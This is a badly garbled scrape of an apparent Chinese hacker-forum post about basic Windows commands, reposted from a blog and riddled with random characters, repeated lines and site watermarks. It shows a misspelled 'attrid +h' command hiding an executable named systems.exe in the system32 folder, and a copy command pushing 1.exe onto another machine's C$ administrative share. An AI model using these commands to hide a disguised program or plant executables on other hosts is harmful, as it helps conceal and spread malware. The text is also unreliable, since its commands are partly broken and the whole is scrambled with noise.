4_;t-|+j7x rB0
B9i@‑u7b&XYN6n0 隐藏命令 attrid
E|y e2h
============================================================================================
4_;t-|+j7x rB0
B9i@‑u7b&XYN6n0 隐藏命令 attrid
E|y e2h
Q0
★
黑基空间
★
#C8m(Lun
H: 隐藏 R: 只读 A: 存档 S: 系统 ★ 黑基空间 ★ [1]foH upH8D
★ 黑基空间 ★ ;~z+XeH
命令如下 :c:\>attrid +h c:\winnt\system32\systems.exe ★ 黑基空间 ★ ]9p,K7M^ } TJ%y
6~6~8Cm7yJ[1]X4?
n4[0============================================================================================
,z l.aC
H: 隐藏 R: 只读 A: 存档 S: 系统 ★ 黑基空间 ★ [1]foH upH8D
★ 黑基空间 ★ ;~z+XeH
命令如下 :c:\>attrid +h c:\winnt\system32\systems.exe ★ 黑基空间 ★ ]9p,K7M^ } TJ%y
6~6~8Cm7yJ[1]X4?
n4[0============================================================================================
,z l.aC
B'\Q0
!p(af
!p(af
T9R9b5_
C0copy 命令
m5C.qv |0
*DJ h)Zu
C0copy 命令
m5C.qv |0
*DJ h)Zu
Y t/y0c:\>copy c:\1.txt d:\vv\1.txt
将
C
盘复制到
D
盘
VV
目录下
.
★
黑基空间
★
&z T,D_'J
T
T
c
Zz3u&} Z1wBI0c:\>copy c:\1.exe 192.168.0.1\c$ 将 1.exe 复制到 192.168.0.1 的 C 盘目录下 . ★ 黑基空间 ★ [1]^Z _ X+w?
★ 黑基空间 ★ 'X0|.t7}j(Rrdm/Z
=============================================================
Zz3u&} Z1wBI0c:\>copy c:\1.exe 192.168.0.1\c$ 将 1.exe 复制到 192.168.0.1 的 C 盘目录下 . ★ 黑基空间 ★ [1]^Z _ X+w?
★ 黑基空间 ★ 'X0|.t7}j(Rrdm/Z
=============================================================
转载于:https://blog.51cto.com/wnyw106/101601
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
